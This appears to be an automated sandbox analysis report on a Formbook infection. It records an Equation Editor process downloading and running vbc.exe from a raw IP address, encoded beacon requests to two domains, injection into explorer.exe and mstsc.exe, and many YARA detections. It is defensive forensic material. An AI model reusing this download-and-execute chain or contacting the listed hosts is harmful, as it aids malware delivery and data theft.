          Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.1006808699.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.1024716428.0000000007539000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1036517344.0000000007539000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.1037414892.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 0000000A.00000000.1038616558.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026858297.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1003477696.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.1033807788.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19CBAA30.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.employeebnsf.com
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03690401
          Source: global trafficHTTP traffic detected: GET /55/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.166Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ== HTTP/1.1Host: www.employeebnsf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 14 May 2022 13:12:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 13:12:24 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.166
          Source: EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com; equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.27da9ec.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0126BA774_2_0126BA77
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EDC404_2_002EDC40
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EDC324_2_002EDC32
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E07084_2_002E0708
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0068E2084_2_0068E208
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006843D04_2_006843D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006855B84_2_006855B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00683F294_2_00683F29
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00683FA84_2_00683FA8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D503084_2_00D50308
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E02244_2_002E0224
          Source: C:\Users\Public\vbc.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0040927B9_2_0040927B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_004092809_2_00409280
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0040DC209_2_0040DC20
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402D8F9_2_00402D8F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D78F9_2_0041D78F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E7BB9_2_0041E7BB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0126BA779_2_0126BA77
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0088E0C69_2_0088E0C6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008BD0059_2_008BD005
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008930409_2_00893040
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008A905A9_2_008A905A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0088E2E99_2_0088E2E9
          Source: C:\Users\Public\vbc.exeCode function: 9_2_009312389_2_00931238
          Source: C:\Users\Public\vbc.exeCode function: 9_2_009363BF9_2_009363BF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0088F3CF9_2_0088F3CF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008B63DB9_2_008B63DB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008923059_2_00892305
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008973539_2_00897353
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008DA37B9_2_008DA37B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008A14899_2_008A1489
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008C54859_2_008C5485
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008CD47D9_2_008CD47D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008AC5F09_2_008AC5F0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0089351F9_2_0089351F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008D65409_2_008D6540
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008946809_2_00894680
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0089E6C19_2_0089E6C1
          Source: C:\Users\Public\vbc.exeCode function: 9_2_009326229_2_00932622
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008DA6349_2_008DA634
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0267123811_2_02671238
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025CE2E911_2_025CE2E9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D735311_2_025D7353
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0261A37B11_2_0261A37B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D230511_2_025D2305
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025F63DB11_2_025F63DB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025CF3CF11_2_025CF3CF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025E905A11_2_025E905A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D304011_2_025D3040
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025FD00511_2_025FD005
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025CE0C611_2_025CE0C6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0267262211_2_02672622
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025DE6C111_2_025DE6C1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D468011_2_025D4680
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_026057C311_2_026057C3
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025DC7BC11_2_025DC7BC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0265579A11_2_0265579A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025E148911_2_025E1489
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0260548511_2_02605485
